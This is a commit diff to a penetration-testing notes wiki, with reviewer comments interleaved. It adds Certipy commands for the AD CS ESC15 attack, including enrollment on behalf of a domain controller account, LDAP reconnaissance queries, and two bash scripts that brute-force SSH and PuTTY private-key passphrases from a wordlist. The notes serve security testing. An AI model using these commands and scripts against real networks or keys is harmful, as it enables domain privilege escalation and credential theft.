[AHK] Automatic update 👽
snovvcrash committed Oct 30, 2024
1 parent 1298391 commit d62fadc
Showing 6 changed files with 82 additions and 7 deletions.
1 change: 1 addition & 0 deletions SUMMARY.md
@@ -17,6 +17,7 @@
- [ESC1](pentest/infrastructure/ad/ad-cs-abuse/esc1.md)
- [ESC4](pentest/infrastructure/ad/ad-cs-abuse/esc4.md)
- [ESC8](pentest/infrastructure/ad/ad-cs-abuse/esc8.md)
- [ESC15](pentest/infrastructure/ad/ad-cs-abuse/esc15.md)
- [Golden Certificate](pentest/infrastructure/ad/ad-cs-abuse/golden-certificate.md)
* [ADIDNS Abuse](pentest/infrastructure/ad/adidns-abuse.md)
* [Attack Trusts](pentest/infrastructure/ad/attack-trusts.md)
8 changes: 4 additions & 4 deletions pentest/infrastructure/ad/ad-cs-abuse/esc15.md
@@ -13,13 +13,13 @@ description: Inject Application Policies into Version 1 Certificate Templates

Get enabled templates:

```
```powershell
PS > $enabledTemplates = Get-ADObject -LDAPFilter "(&(objectClass=pKIEnrollmentService))" -SearchBase "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,$((Get-ADRootDSE).rootDomainNamingContext)" -Properties certificateTemplates | select -ExpandProperty certificateTemplates
```

Get v1 templates with `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` that are enabled:

```
```powershell
PS > Get-ADObject -Filter 'objectClass -eq "pKICertificateTemplate"' -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,$((Get-ADRootDSE).rootDomainNamingContext)" -Property name,msPKI-Template-Schema-Version,msPKI-Certificate-Name-Flag | ? {$_.'msPKI-Template-Schema-Version' -eq 1 -and ($_.'msPKI-Certificate-Name-Flag' -band 0x00000001)} | ? {$enabledTemplates -contains $_.name}
```

@@ -34,7 +34,7 @@ PS > Get-ADObject -Filter 'objectClass -eq "pKICertificateTemplate"' -SearchBase

Abusing **Client Authentication**:

```
```bash
$ proxychains4 certipy req -u [email protected] -p 'Passw0rd!' -ca CorpCA -target CA01.megacorp.local -target-ip 192.168.1.12 -template VulnTemplate --application-policies '1.3.6.1.5.5.7.3.2' -upn '[email protected]' -sid <DC01_SID> -ns 192.168.1.11 -dc-ip 192.168.1.11 -dns-tcp
```

@@ -44,7 +44,7 @@ $ proxychains4 certipy req -u [email protected] -p 'Passw0rd!' -ca CorpC

Abusing **Certificate Request Agent**:

```
```bash
$ proxychains4 certipy req -u [email protected] -p 'Passw0rd!' -ca CorpCA -target CA01.megacorp.local -target-ip 192.168.1.12 -template VulnTemplate --application-policies '1.3.6.1.4.1.311.20.2.1' -ns 192.168.1.11 -dc-ip 192.168.1.11 -dns-tcp
$ proxychains4 certipy req -u [email protected] -p 'Passw0rd!' -pfx snovvcrash.pfx -ca CorpCA -target CA01.megacorp.local -target-ip 192.168.1.12 -template User -on-behalf-of 'MEGACORP\DC01$' -ns 192.168.1.11 -dc-ip 192.168.1.11 -dns-tcp
```
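Review bot: these two commands are a chain but the text does not say so: the first request with `1.3.6.1.4.1.311.20.2.1` (the Certificate Request Agent OID) produces `snovvcrash.pfx`, and the second passes that file via `-pfx` to enroll the `User` template `-on-behalf-of 'MEGACORP\DC01$'`. A sentence naming the OID and stating that `snovvcrash.pfx` is the file Certipy wrote in step one (its default `<user>.pfx` output name) would tie the two lines together for a reader who does not already know the flow.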
6 changes: 6 additions & 0 deletions pentest/infrastructure/ad/lateral-movement/rdp.md
@@ -7,6 +7,12 @@ description: Remote Desktop Protocol
* [https://syfuhs.net/how-authentication-works-when-you-use-remote-desktop](https://syfuhs.net/how-authentication-works-when-you-use-remote-desktop)
* [https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3](https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3)

Look for terminal servers in a domain:

```powershell
PS > Get-ADComputer -LDAPFilter "(&(objectClass=computer)(memberOf=CN=Terminal Server License Servers,CN=Builtin,$((Get-ADRootDSE).rootDomainNamingContext)))" | select dNSHostName
```




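Review bot: the heading says "terminal servers" but the filter matches members of the Builtin `Terminal Server License Servers` group, which holds RDS licensing servers rather than Remote Desktop Session Hosts, so the query can miss every RDSH and return machines that do not accept RDP at all; either retitle the block ("Look for RDS license servers") or state the limitation next to it. Minor: `(objectClass=computer)` is redundant inside `Get-ADComputer`, which already restricts to computer objects.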
12 changes: 9 additions & 3 deletions pentest/infrastructure/ad/ldap-ldaps.md
@@ -12,6 +12,12 @@ description: Lightweight Directory Access Protocol

![LDAP Authentication Protocols (Almond)](/.gitbook/assets/012.png)

Check if LDAPS was ever correctly configured:

```
$ openssl s_client -host 192.168.1.11 -port 636
```




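Review bot: this fence has no language tag while the rest of the commit is adding `bash` and `powershell` tags, so tag it `bash` for consistency. On substance, the command only shows whether port 636 completes a TLS handshake, and "correctly configured" is not defined; a sentence on what to look at would help (a DC with no usable server certificate fails the handshake outright, and on success the certificate subject/SAN and the `Verify return code` line are what to inspect; connecting by IP as here means the hostname will not match a SAN, so a verify error is expected). `-host`/`-port` work, but `-connect host:port` is the form the `s_client` man page documents.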
@@ -91,7 +97,7 @@ Function DecodeUserAccountControl ([int]$UAC)

- [https://github.com/zyn3rgy/LdapRelayScan](https://github.com/zyn3rgy/LdapRelayScan)

Scan for LDAP Singing and LDAP Channel Binding:
Scan for LDAP Singing and LDAPS Channel Binding:

```
$ python3 LdapRelayScan.py -method BOTH -dc-ip 192.168.1.11 -u snovvcrash -p 'Passw0rd!'
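Review bot: the edited line still carries the typo "Singing" (should be "Signing"); since the line is being changed anyway it should read "Scan for LDAP Signing and LDAPS Channel Binding:". Consistency point: the fence below it is untagged while the commit tags other shell blocks `bash`.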
@@ -101,7 +107,7 @@ $ for dc in `cat discover/hosts/dc_ip.txt`; do cme ldap $dc -u snovvcrash -p 'Pa



### LDAP Signing & LDAP Channel Binding
### LDAP Signing & LDAPS Channel Binding

- [https://offsec.almond.consulting/bypassing-ldap-channel-binding-with-starttls.html](https://offsec.almond.consulting/bypassing-ldap-channel-binding-with-starttls.html)

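Review bot: renaming the heading changes its generated anchor slug, so any in-repo link to the old "LDAP Signing & LDAP Channel Binding" anchor breaks; worth a grep for references before merging. Also, channel binding is enforced for LDAP over TLS generally, which includes StartTLS on 389 (the exact case the Almond link below this heading discusses), so "LDAPS" is slightly narrower than the mechanism; "LDAP (TLS) Channel Binding" or a short note would be more precise.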
@@ -116,7 +122,7 @@ If `LdapServerIntegrity` is set to `2`, LDAP Signing is required:
PS > Get-ItemProperty "HKLM:\System\CurrentControlSet\Services\NTDS\Parameters\" -Name LdapServerIntegrity
```

If `LdapEnforceChannelBinding` is set to `2`, LDAP Channel Binding is **always** required:
If `LdapEnforceChannelBinding` is set to `2`, LDAPS Channel Binding is **always** required:

```
PS > Get-ItemProperty "HKLM:\System\CurrentControlSet\Services\NTDS\Parameters\" -Name LdapEnforceChannelBinding
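Review bot: the text documents only value `2`, but `LdapEnforceChannelBinding` has three settings: `0` (never), `1` (when supported: clients that send a channel binding token have it validated, clients that send none are still accepted) and `2` (always). `1` is the common interim setting and is exactly the state a relay assessment needs to recognise, so a line covering it would complete the description. Same LDAPS-versus-TLS wording point as for the heading above.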
61 changes: 61 additions & 0 deletions pentest/perimeter/ssh.md
@@ -59,6 +59,67 @@ $ nmap -p 22 --script ssh-publickey-acceptance --script-args "ssh.usernames={'ro



## Quicky Offline Private Key Crack

- [https://security.stackexchange.com/a/191122](https://security.stackexchange.com/a/191122)

{% tabs %}
{% tab title="PEM/OpenSSH" %}
{% code title="pem-crack.sh" %}
```bash
#!/usr/bin/env bash

echo "Wordlist : $1"
echo "PEM key : $2"
echo "New PEM key : $3"
cp "$2" "$3" && chmod 600 "$3"

while read -r line
do
err=$( (ssh-keygen -p -P "$line" -N '' -f "$3") 2>&1 )

if [[ ! $err = *"incorrect passphrase"* ]]; then
echo "Passphrase : $line"
echo "$err"
break
fi
done < "$1"
```
{% endcode %}
{% endtab %}
{% tab title="PuTTY PPK" %}
{% code title="ppk-crack.sh" %}
```bash
#!/usr/bin/env bash
# sudo apt install putty-tools -y

echo "Wordlist : $1"
echo "PEM key : $2"
echo "New PEM key : $3"

touch /tmp/empty
while read -r line
do
echo "$line" > /tmp/w
err=$( (puttygen "$2" -P -o "$3" --old-passphrase /tmp/w --new-passphrase /tmp/empty) 2>&1 )

if [[ ! $err = *"wrong passphrase"* ]]; then
echo "Passphrase : $line"
echo "$err"
puttygen "$3" -O private-openssh -o "$3"
break
fi
done < $1

rm -f /tmp/w /tmp/empty
```
{% endcode %}
{% endtab %}
{% endtabs %}




## Enum Users

**CVE-2018-15473**
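Review bot: "Quicky" in the new heading should be "Quick". In `ppk-crack.sh` the labels still say `PEM key` although the inputs are PPK files, and `done < $1` is unquoted (the PEM variant quotes it), so a wordlist path containing a space breaks the loop; the candidate passphrase is also written to the fixed, predictable path `/tmp/w` on a shared filesystem, where `mktemp` plus a `trap` to clean up on interrupt would be the safer choice. In `pem-crack.sh` the success test is "error text does not contain `incorrect passphrase`", so any other failure (unreadable key, unsupported format, `ssh-keygen` missing) is reported as the found passphrase; checking the exit status or the explicit success message would avoid that false positive.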
1 change: 1 addition & 0 deletions redteam/maldev/winapi.md
@@ -13,3 +13,4 @@
## Tools

- [https://github.com/MalwareApiLib/MalwareApiLibrary](https://github.com/MalwareApiLib/MalwareApiLibrary)
- [https://www.leeholmes.com/managing-ini-files-with-powershell/](https://www.leeholmes.com/managing-ini-files-with-powershell/)
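Review bot: the added link is about reading and writing INI files from PowerShell, which has no evident connection to the WinAPI/maldev topic of this page or to the `MalwareApiLibrary` entry above it; if it was meant for a PowerShell or general tooling page it should move there, otherwise a few words on why it belongs under WinAPI Tools would help the reader.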
